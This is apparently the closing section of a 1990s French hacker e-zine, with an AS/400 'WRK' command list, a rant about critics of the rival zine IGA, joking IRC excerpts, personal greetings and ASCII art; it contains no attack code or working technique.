WRKDEVTBL Work with Device Tables
WRKDIR Work with Directory
WRKDOC Work with Documents
WRKDOCLIB Work with Remote Document Lib
WRKDOCPRTQ Work with Document Print Queue
WRKDPCQ Work with DSNX/PC Queues
WRKDSTL Work with Distribution Lists
WRKDSTQ Work with Distribution Queue
WRKDTADCT Work with Data Dictionaries
WRKDTADFN Work with Data Definitions
WRKF Work with Files
WRKFLR Work with Folders
WRKHDWPRD Work with Hardware Products
WRKJOB Work with Job
WRKJOBD Work with Job Descriptions
WRKJOBQ Work with Job Queue
WRKJRN Work with Journal
WRKJRNA Work with Journal Attributes
WRKLIB Work with Libraries
WRKLIBPDM Work with Libraries Using PDM
WRKLIND Work with Line Descriptions
WRKMBRPDM Work with Members Using PDM
WRKMNU Work with Menus
WRKMODD Work with Mode Descriptions
WRKMSGD Work with Message Descriptions
WRKMSGQ Work with Message Queues
WRKNETF Work with Network Files
WRKNETJOBE Work with Network Job Entries
WRKOBJ Work with Objects
WRKOBJLCK Work with Object Locks
WRKOBJPDM Work with Objects Using PDM
WRKOUTQ Work with Output Queue
WRKOUTQD Work with OUTQ Description
WRKPGMTBL Work with Program Tables
WRKPRB Work with Problem
WRKPRDINF Work with Product Information
WRKQRY Work With Queries
WRKQST Work with Questions
WRKSPLF Work with Spooled Files
WRKRPYLE Work with Reply List Entries
WRKSBMJOB Work with Submitted Jobs
WRKSBS Work with Subsystems
WRKSBSD Work with Subsystem Desc
WRKSBSJOB Work with Subsystem Jobs
WRKSOC Work with Sphere of Control
WRKSPLF Work with Spooled Files
WRKSPLFA Work with Spooled File Attr
WRKSYSSTS Work with System Status
WRKTIE Work with TIE
WRKTXTPRF Work With Text Profiles
WRKUSRJOB Work with User Jobs
WRKUSRPRF Work with User Profiles
WRKUSRTBL Work with User Tables
WRKWTR Work with Writers


+++Crash Test+++

-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------

XII] Les beaux parleurs !

Eh oui il y en a des gars qui parlent, les vantards, les snobinard, les modestes, les faux
modestes, etc... Mais la pire de toute les races c'est les gars qui critiquent un truc à
mort et qu'on voit apparaître dans le tableau supporter de certains crew ex:
Un certains nombre de personnes de la liste ci dessous ont pu dire sur #hack.fr par ex ;)
Mouais IGA c'est de la merde, c'est des lames, etc.. etc... et pourtant !

-------------------------------------------------------------------------------------------
Supporter



SaBoTaGe SeOp LeSaint Elnino15
SLIMJIM KneWoN |HoudinI| SunState
Vipola Jideel A-yoyeSTI rio18
[-ODin-] marshall GKhan88 drunky
FILA667 danseur ScanDium GaZou--
Dreamday processor jonathan2 GurneyH
JunK-Y _koshiz_ }SoJab{ err418
_Franck Pushead _Cybelle_ Werewolf
BobsKC Shameer Candigal Voodoo
Smerchez Romantico Nadia21 Ti-Diable
LeFURoTTE Psyka0s Lips-Sil WildThang
Q-Derf BlackOp B_real Chanou
Gallia Eglisorme Private !Radium!
CameleonJ
------------------------------------------------------------------------------------------

extrait d'IGA Numéro 007

Alors les gars, vous allez pas l'air con là ? Je me fou complètement des gens qui
critique mais quand c'est pour apparaitre dans la section "supporter" de ces mêmes
personnes, ca fait vachement craignos... Alors désolé mais... fermez là ! Et ayez
courage de vos opinions. Si vous aimez IGA dites le ! Et ne gueuler pas que c'est de la
merde simplement parce qu'un type de la scène a dit la même chose !! Ne soyez pas des
BOEUFS à la raison étriquée !! Vous avez de droit d'aimer ou de ne pas aimer... ce n'est
pas un crime que d'avoir sa propre raison...

+++Brain Override+++


------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------


XIII] Greets !

<BrAiNrAgE> Eh Brain, t'es vraiment le meilleur hacker que je connaisse !
<Brain-Ove> Mouaaaaarf :))).. t'auras pas un @ pour autant ;)
<BrAiNrAgE> Bouhhhh....:((((((

<Z3r0-Coo1> Eh les gars je cherche un hacker qui voudrait m'apprendre à me servire de BO.
<Brain-Ove> Demande à W c'est le chef de tous les hackers.
<Z3r0-Coo1> Mais pourquoi il est sur autant de channels ?
<Brain-Ove> Il est tellement fort qu'il a hacké UNDERNET !
<Z3r0-Coo1> Ok.. Eh W tu peux m'aider à me servir de back orrifice ?
*** Z3r0-Coo1 as been kicked from #hack.fr by Brain-Ove (Trop de lame !!)

[00:59] <Solid-> pk tu ma kicker?

Je remercie la copine mystérieuse de Brain Override. Qui que tu sois, grâce à toi, il ne
ramène plus de filles chez moi pendant que je débuggue ses programmes parce que monsieur,
a d'autres programmes...fort bruyants d'ailleurs. Grâce à toi je récupère ma chambre, pour
mes froides nuits d'hiver, encore merci ! +++Crash Test+++

Qui que tu sois, moi aussi je te remercie ! Grâce à toi Brain n'est plus entouré d'un
million de filles, c'était pas très pratique pour se concentrer sur le système !
J'ai jamais encore compris comment Brain faisait pour tenir le coup !
Eh Brain, C'est pas toi qu'a breveté le viagra ? +++Phoenix+++

Eh les gars ! Ca fait pas sérieux ce genre de remarques !! Bon moi je voudrai remercier
!LLEGAL, ASheS, Redsativa alias Liquid_X alias Mob alias Snowcrash (c'est quoui le
prochain ?), Le virus informatique et Pirate, 2 mag hors normes, DefBond, Thorin, Utopiste
ainsi que tous les membres des channels #hack.fr, #rhino9, #cdif, #linuxfr...
Je remercie plus particulièrement ma copine mystérieuse (qui m'a larguée d'ailleurs...),
je sais qu'elle ne lira probablement jamais ce texte, mais je veux te dire que je t'aime
plus que tout au monde et que je serai toujours là pour toi... Je tiens aussi à remercier
mon ami Julien qui doit supporter mon inssuportable caractère qui se limite parfois à
parler de celle que j'aime en boucle pendant quelques heures ou bien à lui dire : il est
17H00..elle ne m'a toujours pas appelé....snif.. Je remercie aussi Sylvie pour être si
gentille avec moi quand j'en ai besoin et pour cette brève mais très agréable soirée en
Italie. Tu arrives à me faire sourire alors qu'en ce moment j'ai le blues à fond... c'est
cool ! Un remerciement aussi à tous les admins, les sysop, pour leur stupidité. A Bernard
Héliord pour ses mails sympatiques, au chocolat, au café, au coca... à ma mère.. pour sa
patience devant mon bordel...et pour finir à la connerie et à l'ignorance sans lesquelles
nous ne serions pas là pour les combattres... A vaincre sans peril, on triomphe sans
gloire... +++Brain Override+++

Je voudrai egalement faire remarquer l'excellent zine FRANCAIS CRYPTEL, un mag quasi
parfait, sans prétentions et qui pourtant vaux bien mieux que certains plus en vue...
altern.org/cryptel : un vrai régal !

[15:33] <Cr4ck0z> T mon idole! =)

[15:35] <oktober> Vive la scène franco et que ces lamerz de iga disparaissent, c'est
mon commentaire
[15:35] <oktober> ... et je le partage

[15:35] <Lunack> vous savez pas ou je peux avoir de la doc pour savoir comment ca marche
les exploits ??

[17:05] <Snowcrach> L'insulte pour l'excuse ne vaut rien.



-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
C O N C L U S I O N
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------





Bon.. et bien j'espère que cette première ne vous a pas trop déçue. C'est un peu newbie
pour commencer puis cela se complexifiera au fil des numéros. Nous sommes ouverts à toutes
vos suggestions et tous commentaires (même ignobles !) et si vous avez envie d'écrire
un article pour nous... N'hésitez pas. On essaiera de vous pondre un truc un peu plus
technique pour la prochaine fois ;) @+






+ + + B r 4 1 n 0 v 3 r r ! d 3 + + +




XX XX
X**X X X**X
X****X X X X X****X
X******X X*X X*X X******X
X********X X**X X**X X********X
X**********X X**XX X**XX X**********X
X***********XXXXXXXXXXXXXXXXXXX***********X
XXX***********X X*****X X***********XXX
X**************XX X***X XX**************X
X****************X X*X X****************X
X**************XXXXX X XXXXX*************X
X*****XXXX****X X X X****XXXX*****X
X*****X X***X X X X***X X*****X
XX****X X*X X XX XX X X*X X****XX
X*****X X X X X X X X X X****XX
X****X XX X X X XX X****X
X**XX X X X X X X X X XX**X
X*XX X XX X X X X XX X XX*X
X*X X X XX X X XX X X X*X
XX X X XXXX X X XXXX X X XX
X X X XX X X XX X X X
X X X X X X
X X X X X X
X X X X X X
X X X X X X
X X X X X X
XX X XX
X X X


next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT